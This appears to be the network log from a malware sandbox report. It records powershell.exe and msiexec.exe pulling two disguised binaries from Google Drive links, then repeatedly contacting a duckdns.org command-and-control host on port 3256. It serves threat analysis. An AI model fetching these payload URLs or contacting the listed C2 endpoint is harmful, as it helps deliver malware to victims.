    drive.google.com
    msiexec.exe
    Remote address:
    8.8.8.8:53
    Request
    drive.google.com
    IN A
    Response
    drive.google.com
    IN A
    142.250.187.206
  • Country: GB
    GET
    https://drive.google.com/uc?export=download&id=1vlinawCCDdnC8GarsrI_EoyH1NCS58Cw
    powershell.exe
    Remote address:
    142.250.187.206:443
    Request
    GET /uc?export=download&id=1vlinawCCDdnC8GarsrI_EoyH1NCS58Cw HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: drive.google.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Thu, 14 Nov 2024 13:23:45 GMT
    Location: https://drive.usercontent.google.com/download?id=1vlinawCCDdnC8GarsrI_EoyH1NCS58Cw&export=download
    Strict-Transport-Security: max-age=31536000
    Cross-Origin-Opener-Policy: same-origin
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'nonce-TGJ4MAriJPIY4OJnBlZS0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data:;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • Country: US
    DNS
    228.249.119.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    228.249.119.40.in-addr.arpa
    IN PTR
    Response
  • Country: US
    DNS
    206.187.250.142.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    206.187.250.142.in-addr.arpa
    IN PTR
    Response
    206.187.250.142.in-addr.arpa
    IN PTR
    lhr25s33-in-f14.1e100.net
  • Country: US
    DNS
    drive.usercontent.google.com
    msiexec.exe
    Remote address:
    8.8.8.8:53
    Request
    drive.usercontent.google.com
    IN A
    Response
    drive.usercontent.google.com
    IN A
    142.250.180.1
  • Country: GB
    GET
    https://drive.usercontent.google.com/download?id=1vlinawCCDdnC8GarsrI_EoyH1NCS58Cw&export=download
    powershell.exe
    Remote address:
    142.250.180.1:443
    Request
    GET /download?id=1vlinawCCDdnC8GarsrI_EoyH1NCS58Cw&export=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Content-Type: application/octet-stream
    Content-Security-Policy: sandbox
    Content-Security-Policy: default-src 'none'
    Content-Security-Policy: frame-ancestors 'none'
    X-Content-Security-Policy: sandbox
    Cross-Origin-Opener-Policy: same-origin
    Cross-Origin-Embedder-Policy: require-corp
    Cross-Origin-Resource-Policy: same-site
    X-Content-Type-Options: nosniff
    Content-Disposition: attachment; filename="Carcinogenicity.fla"
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Credentials: false
    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, 
X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Places-Ios-Sdk, X-Android-Package, X-Android-Cert, X-Places-Android-Sdk, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt, X-Cloud-Trace-Context, traceparent, x-goog-chat-space-id, x-goog-pan-request-context, X-AppInt-Credentials
    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
    Accept-Ranges: bytes
    Content-Length: 462080
    Last-Modified: Tue, 05 Nov 2024 23:06:17 GMT
    X-GUploader-UploadID: AHmUCY23L0giMBWo-gf_w0msrs2jxxVHFUIQ2m5V_CBaxdsYYE2QX0O0lMs2PNm7Ki705uYJcUZqhgfM-A
    Date: Thu, 14 Nov 2024 13:23:48 GMT
    Expires: Thu, 14 Nov 2024 13:23:48 GMT
    Cache-Control: private, max-age=0
    X-Goog-Hash: crc32c=0gXoUw==
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • Country: US
    DNS
    1.180.250.142.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    1.180.250.142.in-addr.arpa
    IN PTR
    Response
    1.180.250.142.in-addr.arpa
    IN PTR
    lhr25s32-in-f1.1e100.net
  • Country: US
    DNS
    64.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    64.159.190.20.in-addr.arpa
    IN PTR
    Response
  • Country: US
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • Country: US
    DNS
    217.106.137.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    217.106.137.52.in-addr.arpa
    IN PTR
    Response
  • Country: GB
    GET
    https://drive.google.com/uc?export=download&id=1FzV1vypLGpKExTpM69ehSsFhTyQA1RIA
    msiexec.exe
    Remote address:
    142.250.187.206:443
    Request
    GET /uc?export=download&id=1FzV1vypLGpKExTpM69ehSsFhTyQA1RIA HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: drive.google.com
    Cache-Control: no-cache
    Response
    HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Thu, 14 Nov 2024 13:24:15 GMT
    Location: https://drive.usercontent.google.com/download?id=1FzV1vypLGpKExTpM69ehSsFhTyQA1RIA&export=download
    Strict-Transport-Security: max-age=31536000
    Cross-Origin-Opener-Policy: same-origin
    Content-Security-Policy: script-src 'nonce-JQEBqyDb8an24rGTyYmryQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data:;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • Country: US
    DNS
    c.pki.goog
    msiexec.exe
    Remote address:
    8.8.8.8:53
    Request
    c.pki.goog
    IN A
    Response
    c.pki.goog
    IN CNAME
    pki-goog.l.google.com
    pki-goog.l.google.com
    IN A
    216.58.201.99
  • Country: GB
    GET
    http://c.pki.goog/r/r1.crl
    msiexec.exe
    Remote address:
    216.58.201.99:80
    Request
    GET /r/r1.crl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: c.pki.goog
    Response
    HTTP/1.1 200 OK
    Accept-Ranges: bytes
    Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
    Cross-Origin-Resource-Policy: cross-origin
    Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
    Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
    Content-Length: 854
    X-Content-Type-Options: nosniff
    Server: sffe
    X-XSS-Protection: 0
    Date: Thu, 14 Nov 2024 12:53:06 GMT
    Expires: Thu, 14 Nov 2024 13:43:06 GMT
    Cache-Control: public, max-age=3000
    Age: 1869
    Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
    Content-Type: application/pkix-crl
    Vary: Accept-Encoding
  • Country: US
    DNS
    o.pki.goog
    msiexec.exe
    Remote address:
    8.8.8.8:53
    Request
    o.pki.goog
    IN A
    Response
    o.pki.goog
    IN CNAME
    pki-goog.l.google.com
    pki-goog.l.google.com
    IN A
    216.58.201.99
  • Country: GB
    GET
    http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDzySkSNBgXtBKLijHUmMxR
    msiexec.exe
    Remote address:
    216.58.201.99:80
    Request
    GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDzySkSNBgXtBKLijHUmMxR HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: o.pki.goog
    Response
    HTTP/1.1 200 OK
    Server: ocsp_responder
    Content-Length: 472
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    Date: Thu, 14 Nov 2024 13:05:49 GMT
    Cache-Control: public, max-age=14400
    Content-Type: application/ocsp-response
    Age: 1106
  • Country: GB
    GET
    http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACECt1gF5RMj4mChEciVJIkog%3D
    msiexec.exe
    Remote address:
    216.58.201.99:80
    Request
    GET /wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACECt1gF5RMj4mChEciVJIkog%3D HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: o.pki.goog
    Response
    HTTP/1.1 200 OK
    Server: ocsp_responder
    Content-Length: 471
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    Date: Thu, 14 Nov 2024 12:45:22 GMT
    Cache-Control: public, max-age=14400
    Content-Type: application/ocsp-response
    Age: 2333
  • flag-gb
    GET
    https://drive.usercontent.google.com/download?id=1FzV1vypLGpKExTpM69ehSsFhTyQA1RIA&export=download
    msiexec.exe
    Remote address:
    142.250.180.1:443
    Request
    GET /download?id=1FzV1vypLGpKExTpM69ehSsFhTyQA1RIA&export=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Content-Type: application/octet-stream
    Content-Security-Policy: sandbox
    Content-Security-Policy: default-src 'none'
    Content-Security-Policy: frame-ancestors 'none'
    X-Content-Security-Policy: sandbox
    Cross-Origin-Opener-Policy: same-origin
    Cross-Origin-Embedder-Policy: require-corp
    Cross-Origin-Resource-Policy: same-site
    X-Content-Type-Options: nosniff
    Content-Disposition: attachment; filename="fKHFybIJZyCEV7.bin"
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Credentials: false
    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Places-Ios-Sdk, X-Android-Package, X-Android-Cert, X-Places-Android-Sdk, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt, X-Cloud-Trace-Context, traceparent, x-goog-chat-space-id, x-goog-pan-request-context, X-AppInt-Credentials
    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
    Accept-Ranges: bytes
    Content-Length: 493120
    Last-Modified: Sun, 03 Nov 2024 21:43:54 GMT
    X-GUploader-UploadID: AFiumC77ns-tcKfkcC2v6SMUUYmGA40WMrr2yskT1_lQME9mldCPfYdSGqTtobPfILgiqXzFSkQ
    Date: Thu, 14 Nov 2024 13:24:18 GMT
    Expires: Thu, 14 Nov 2024 13:24:18 GMT
    Cache-Control: private, max-age=0
    X-Goog-Hash: crc32c=7cbDrw==
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • flag-us
    DNS
    99.201.58.216.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    99.201.58.216.in-addr.arpa
    IN PTR
    Response
    99.201.58.216.in-addr.arpa
    IN PTR
    prg03s02-in-f3.1e100.net
    99.201.58.216.in-addr.arpa
    IN PTR
    lhr48s48-in-f3.1e100.net
    99.201.58.216.in-addr.arpa
    IN PTR
    prg03s02-in-f99.1e100.net
  • flag-us
    DNS
    200.163.202.172.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    200.163.202.172.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    18.31.95.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    18.31.95.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.210.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.210.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    a458386d9.duckdns.org
    msiexec.exe
    Remote address:
    8.8.8.8:53
    Request
    a458386d9.duckdns.org
    IN A
    Response
    a458386d9.duckdns.org
    IN A
    192.169.69.26
  • flag-us
    DNS
    a458386d9.duckdns.org
    msiexec.exe
    Remote address:
    8.8.8.8:53
    Request
    a458386d9.duckdns.org
    IN A
    Response
  • flag-us
    DNS
    26.69.169.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    26.69.169.192.in-addr.arpa
    IN PTR
    Response
    26.69.169.192.in-addr.arpa
    IN PTR
    sinkhole.hyas.com
  • flag-us
    DNS
    180.129.81.91.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    180.129.81.91.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    31.243.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    31.243.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    a458386d9.duckdns.org
    msiexec.exe
    Remote address:
    8.8.8.8:53
    Request
    a458386d9.duckdns.org
    IN A
    Response
    a458386d9.duckdns.org
    IN A
    192.169.69.26
  • 142.250.187.206:443
    https://drive.google.com/uc?export=download&id=1vlinawCCDdnC8GarsrI_EoyH1NCS58Cw
    tls, http
    powershell.exe
    917 B
    9.0kB
    9
    11

    HTTP Request

    GET https://drive.google.com/uc?export=download&id=1vlinawCCDdnC8GarsrI_EoyH1NCS58Cw

    HTTP Response

    303
  • 142.250.180.1:443
    https://drive.usercontent.google.com/download?id=1vlinawCCDdnC8GarsrI_EoyH1NCS58Cw&export=download
    tls, http
    powershell.exe
    9.0kB
    496.2kB
    185
    361

    HTTP Request

    GET https://drive.usercontent.google.com/download?id=1vlinawCCDdnC8GarsrI_EoyH1NCS58Cw&export=download

    HTTP Response

    200
  • 142.250.187.206:443
    https://drive.google.com/uc?export=download&id=1FzV1vypLGpKExTpM69ehSsFhTyQA1RIA
    tls, http
    msiexec.exe
    1.3kB
    10.2kB
    16
    13

    HTTP Request

    GET https://drive.google.com/uc?export=download&id=1FzV1vypLGpKExTpM69ehSsFhTyQA1RIA

    HTTP Response

    303
  • 216.58.201.99:80
    http://c.pki.goog/r/r1.crl
    http
    msiexec.exe
    395 B
    1.8kB
    6
    5

    HTTP Request

    GET http://c.pki.goog/r/r1.crl

    HTTP Response

    200
  • 216.58.201.99:80
    http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACECt1gF5RMj4mChEciVJIkog%3D
    http
    msiexec.exe
    830 B
    1.6kB
    8
    5

    HTTP Request

    GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDzySkSNBgXtBKLijHUmMxR

    HTTP Response

    200

    HTTP Request

    GET http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACECt1gF5RMj4mChEciVJIkog%3D

    HTTP Response

    200
  • 142.250.180.1:443
    https://drive.usercontent.google.com/download?id=1FzV1vypLGpKExTpM69ehSsFhTyQA1RIA&export=download
    tls, http
    msiexec.exe
    18.4kB
    528.8kB
    388
    385

    HTTP Request

    GET https://drive.usercontent.google.com/download?id=1FzV1vypLGpKExTpM69ehSsFhTyQA1RIA&export=download

    HTTP Response

    200
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
